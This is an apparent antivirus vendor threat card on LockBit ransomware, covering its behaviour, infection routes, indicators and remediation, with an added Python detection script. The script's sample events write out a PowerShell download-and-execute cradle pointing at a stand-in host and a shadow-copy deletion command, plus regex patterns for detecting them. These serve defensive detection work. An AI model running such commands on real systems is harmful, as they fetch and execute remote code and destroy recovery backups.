Critical · Active · Trending
Critical Risk
95%

LockBit Ransomware

Affiliate-based ransomware known for fast encryption and double extortion.

#ransomware #double-extortion #windows

Threat summary

LockBit operates as a ransomware-as-a-service platform. Affiliates deploy encryptors across networks, exfiltrate sensitive data, and publish leaks to pressure victims into paying ransoms.

Attack behavior

  • Mass file encryption using hybrid AES + RSA schemes
  • Shadow copy and backup service deletion
  • Data exfiltration prior to encryption for double extortion
  • Lateral movement via stolen credentials and RDP

Infection methods

  • Phishing attachments
  • Exploited VPN or RDP endpoints
  • Malicious email links
  • Supply-chain compromise

Symptoms and indicators

  • Renamed files with unusual extensions
  • Ransom notes on desktops
  • Disabled recovery tools
  • Unexpected network traffic spikes

Immediate mitigation

  • Isolate affected endpoints immediately
  • Preserve forensic images before cleanup
  • Notify legal and incident response teams
  • Do not pay ransom without professional guidance

Removal guide

  • Boot from clean media and scan offline
  • Restore from verified offline backups
  • Rebuild compromised domain controllers
  • Rotate all domain credentials

Prevention methods

  • Enable behavioral ransomware protection
  • Maintain immutable offline backups
  • Patch edge services and disable unused RDP
  • Enforce least-privilege access

Telemetry indicators

  • vssadmin delete shadows
  • Mass .lockbit extension renames
  • Suspicious PowerShell download cradle
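As an added illustration, not part of the original card or the AntiMatter product, the following Python turns the three telemetry indicators above into detection logic and runs it over constructed sample events; the log line format, host names, rename threshold and time window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry, not from the page: "<iso-timestamp> <host> <proc|file> <detail>".
SAMPLE_EVENTS = [
    "2024-05-01T09:00:00 ws01 proc powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')",
    "2024-05-01T09:00:20 ws01 proc vssadmin delete shadows",
    "2024-05-01T09:00:31 ws01 file C:\\Users\\j\\Documents\\q1.xlsx.lockbit",
    "2024-05-01T09:00:32 ws01 file C:\\Users\\j\\Documents\\q2.xlsx.lockbit",
    "2024-05-01T09:00:33 ws01 file C:\\Users\\j\\Documents\\plan.docx.lockbit",
    "2024-05-01T09:00:34 ws01 file C:\\Users\\j\\Pictures\\a.jpg.lockbit",
    "2024-05-01T09:00:35 ws01 file C:\\Users\\j\\Pictures\\b.jpg.lockbit",
    "2024-05-01T09:05:00 ws02 proc powershell.exe -c Get-Date",
    "2024-05-01T09:05:10 ws02 file C:\\Temp\\sample1.bin.lockbit",
    "2024-05-01T09:20:10 ws02 file C:\\Temp\\sample2.bin.lockbit",
]

# Indicator patterns; threshold and window are hypothetical and should be tuned to the baseline rename rate.
VSS_DELETE = re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)
# A download cradle needs both a download API and an execution verb in one PowerShell command line.
PS_CRADLE = re.compile(r"powershell(?=.*(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest))"
                       r"(?=.*(?:\bIEX\b|Invoke-Expression))", re.I)
LOCKBIT_EXT = re.compile(r"\.lockbit$", re.I)
RENAME_THRESHOLD, RENAME_WINDOW = 5, timedelta(seconds=60)

def parse(line):
    ts, host, kind, detail = line.split(" ", 3)
    return datetime.fromisoformat(ts), host, kind, detail

def detect(lines):
    """Return sorted (host, indicator) pairs; each host is flagged once per indicator."""
    findings = set()
    renames = defaultdict(list)  # host -> timestamps of files taking the .lockbit extension
    for line in lines:
        ts, host, kind, detail = parse(line)
        if kind == "proc" and VSS_DELETE.search(detail):
            findings.add((host, "shadow_copy_deletion"))
        if kind == "proc" and PS_CRADLE.search(detail):
            findings.add((host, "powershell_download_cradle"))
        if kind == "file" and LOCKBIT_EXT.search(detail):
            renames[host].append(ts)
    # A burst of RENAME_THRESHOLD renames inside RENAME_WINDOW is mass encryption; ws02's slow trickle is not flagged.
    for host, times in renames.items():
        times.sort()
        if any(times[i + RENAME_THRESHOLD - 1] - times[i] <= RENAME_WINDOW
               for i in range(len(times) - RENAME_THRESHOLD + 1)):
            findings.add((host, "mass_lockbit_rename"))
    return sorted(findings)
```

Calling `detect(SAMPLE_EVENTS)` flags ws01 for all three indicators and leaves ws02 clean, since two renames fifteen minutes apart never fill the window.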

LockBit campaigns continue through affiliate networks despite law-enforcement disruptions. Treat it as an active high-risk family.

AntiMatter AV — Enterprise Cybersecurity Platform